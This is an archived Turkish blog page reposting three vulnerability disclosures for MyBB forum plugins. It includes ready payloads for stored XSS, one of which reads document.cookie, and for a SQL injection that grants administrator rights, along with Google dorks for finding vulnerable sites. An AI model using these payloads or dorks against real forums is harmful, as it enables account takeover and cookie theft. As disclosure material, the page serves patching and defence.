Archive for 19 Aralık 2012

Social Sites MyBB Plugin 0.2.2 Cross Site Scripting

Social Sites MyBB Plugin 0.2.2 versiyonunda Cross Site Scripting açığı bulunmuş olup, açıkla ilgili olarak açık bulucunun açıklamaları aşağıdadır;

# Exploit Title: Social Sites MyBB Plugin 0.2.2 Cross Site Scripting
# Google Dork: inurl:usercp.php?action=socialsites
# Date: 13.12.2012
# Exploit Author: s3m00t
# Vendor Homepage: http://mattrogowski.co.uk/mybb/
# Software Link: http://mods.mybb.com/view/social-sites
# Version: 0.2.2
# Tested on: PHP

Reason:
Lack of input validation at several places.

Proof of Concept:
1. Navigate to "usercp.php?action=socialsites" and you will see a number of
fields as http://i.imgur.com/0tz98.png.
2. Submit below input into any of the field:
" /><script>alert(1)</script><img src="
3. The input will be stored as shown at http://i.imgur.com/Z8bYM.png

Solution:
Replace the content of "inc/plugins/socialsites.php" with this script:
http://pastebin.com/5JLdg4gh

MyYoutube MyBB plugin SQL UPDATE injection

MyYoutube MyBB plugin SQL UPDATE injection açığı bulunmuş olup, açığın oluşumu ve açıkla ilgili source codeler aşağıdadır. Açık bulucunun açıkla ilgili anlatımları şu şekilde;



# Exploit Title: MyYoutube MyBB plugin SQL UPDATE injection.





# Google Dork: inurl:member.php intext:"Youtube Video" intitle:"Profile of"





# Date: 12.10.2012





# Exploit Author: Zixem





# Vendor Homepage: http://www.mybb-es.com





# Software Link: http://mods.mybb.com/view/myyoutube





# Version: 1.0





# Tested on: Linux.





 





MyYoutube plugin suffers from POST SQL UPDATE injection.





 





The vulnerabillity exist within youtube.php :





<?php





 





$plugins->add_hook("datahandler_user_update", "youtube_update"); /*Line 8*/ 





 





function youtube_update($ytb) /*Line 128*/





 {





    global $mybb;





    if(isset($mybb->input['ytb']))





    {





        $ytb->user_update_data['ytb'] = $mybb->input['ytb'];





    }





}





 





?>





 





Insturctions:





(1) Go to usercp.php?action=profile





 





(2) http://i.imgur.com/gPYdq.png





Enter this in the youtube ID field(just like in the picture): x', usergroup='4





 





(3) Press on the update button.





 





(4) You're an admin now :3





 





 





If you're still not admins, just play with the number...on my pentest forum, the admins usergroup number is 4.





 





PoC: 





before: http://i.imgur.com/aPFsz.png





While exploiting: http://i.imgur.com/gPYdq.png





Result: http://i.imgur.com/4ezpF.png





 





 





http://twitter.com/z1xem





 





-Zixem

MyBB AJAX Chat Persistent XSS Vulnerability

servercheckxss

MyBB AJAX Chat Persistent XSS açığı bulunmuş olup, açığın oluşumu ve kullanıyla ilgili açık bulucunun açıklamaları şu şekilde.


# Title: MyBB AJAX Chat Persistent XSS Vulnerability

# Date: 12/12/2012

# Exploit Author: Mr. P-teo

# Vendor Homepage: http://www.mybb.com/

# Software Link: http://mods.mybb.com/view/ajax-chat

# Version: 1

# Tested on: Windows

The Persistent XSS vulnerability lies within the chat_frame.php page.

*************************************** Persistent / Stored XSS **************************************

Although the message is filter with the htmlentities function below.

<?php       $db->insert_query($tbl, array('uid' => $mybb->user['uid'], 'message' => $db->escape_string(htmlentities($message)), 'date' => time()));<br ?="">
?>

The vulnerability occurs with the use of the urldecode function, allowing us to bypass the htmlentities with url encoding.

<?php       $msg = urldecode($row["message"]);   ?>

The vulnerability can be exploited via the following line, decoded as - "><img alt="" src="XSS" />

%22%3E%3Cimg%20src%3D%22XSS%22%20onerror%3D%22alert(document.cookie)%22%20%2F%3E%0A

This can be expanded on with defaces etc, alert is just a basic example.

Brought to you be Mr. P-teo.

Twitter: http://twitter.com/MrPteo